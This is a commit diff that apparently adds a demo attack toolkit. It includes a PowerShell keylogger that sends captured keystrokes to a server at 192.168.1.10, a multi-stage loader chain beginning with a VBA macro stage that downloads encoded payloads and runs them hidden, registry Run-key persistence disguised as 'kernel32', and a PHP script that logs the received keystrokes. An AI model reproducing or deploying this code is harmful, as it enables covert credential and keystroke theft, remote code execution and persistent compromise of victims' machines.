Add scripts to repo

PayloadScript.ps1

+#requires -Version 2
+function Demo-KeyLogger($Path="http://192.168.1.10/log.php?chars=") 
+{
+  # Signatures for API Calls
+  $signatures = @'
+[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
+public static extern short GetAsyncKeyState(int virtualKeyCode); 
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int GetKeyboardState(byte[] keystate);
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int MapVirtualKey(uint uCode, int uMapType);
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+
+  # load signatures and make members available
+  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
+
+    Write-Host '"Keylogger" is running! Press CTRL+C in order to see keystrokes.' -ForegroundColor Red
+
+    # endless loop to capture keystrokes (end with Ctrl+C)
+	
+	$tmpstr = ""
+	
+    while ($true) {
+      Start-Sleep -Milliseconds 40
+      
+      # scan all ASCII codes above 8
+      for ($ascii = 9; $ascii -le 254; $ascii++) {
+        # this gets current key state to check for keystrokes
+        $state = $API::GetAsyncKeyState($ascii)
+
+        #checking if a key is pressed
+        if ($state -eq -32767) {
+          $null = [console]::CapsLock
+
+          # translate scan code to real code
+          $virtualKey = $API::MapVirtualKey($ascii, 3)
+
+          # get keyboard state
+          $kbstate = New-Object Byte[] 256
+          $checkkbstate = $API::GetKeyboardState($kbstate)
+
+          #StringBuilder to receive input key
+          $mychar = New-Object -TypeName System.Text.StringBuilder
+
+          # translate key
+          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
+
+		  if ($success) {
+			$tmpstr = $tmpstr + $mychar
+			if ($tmpstr.length -gt 10) {
+				Write-Host $tmpstr
+				$URL = $Path + $tmpstr
+				Invoke-WebRequest -UseBasicParsing $URL
+				$tmpstr = ""
+			}
+		  }
+        }
+      }
+    }
+}
+
+#This runs script
+Demo-KeyLogger

Stage2Script.ps1

+$URL = "http://192.168.1.10/demo2/stage3l.txt"
+$WebResponse = Invoke-WebRequest -UseBasicParsing $URL
+$content = $WebResponse.Content
+echo $content
+$PowershellArgs = "-EncodedCommand $content"
+echo $PowershellArgs
+
+echo "Embedding in Registry"
+$PowershellExe = 'powershell.exe'
+$RegistryCommand = "$PowershellExe $PowershellArgs"
+echo $RegistryCommand
+
+$URL = "http://192.168.1.10/demo2/stage3.txt"
+$WebResponse = Invoke-WebRequest -UseBasicParsing $URL
+$content = $WebResponse.Content
+$RegistryScript = "powershell.exe -WindowStyle Hidden -EncodedCommand $content"
+
+$reg_win_path = "HKCU:Software\Microsoft\Windows"
+$reg_path = "HKCU:Software\Microsoft\Windows\CurrentVersion\Run\"
+
+New-ItemProperty -Path $reg_win_path -Name "k32" -Value $RegistryScript
+New-ItemProperty -Path $reg_path -Name "kernel32" -Value $RegistryCommand
+
+echo "Launching Stage 3"
+start powershell -ArgumentList "-WindowStyle Hidden $PowershellArgs"
\ No newline at end of file

Stage3Script.ps1

+$URL = "http://192.168.1.10/demo2/payload.txt"
+$WebResponse = Invoke-WebRequest -UseBasicParsing $URL
+$content = $WebResponse.Content
+echo $content
+$PowershellArgs = "-WindowStyle Hidden -EncodedCommand $content"
+echo $PowershellArgs
+start powershell -ArgumentList $PowershellArgs
\ No newline at end of file

VBAMacroScript.ps1

+$URL = "http://192.168.1.10/demo2/stage2.txt"
+$WebResponse = Invoke-WebRequest -UseBasicParsing $URL
+$content = $WebResponse.Content
+echo $content
+$PowershellArgs = "-WindowStyle Hidden -EncodedCommand $content"
+echo $PowershellArgs
+start powershell -ArgumentList $PowershellArgs
\ No newline at end of file

log.php

+<?php
+$ip=$_SERVER['REMOTE_ADDR'];
+echo $ip;
+echo $_GET["chars"];
+$file = fopen('logs/'.$ip.'.txt', "a") or die("Error cannot open file");
+fwrite($file, $_GET["char"]);
+fclose($file);
+echo "done";
+?>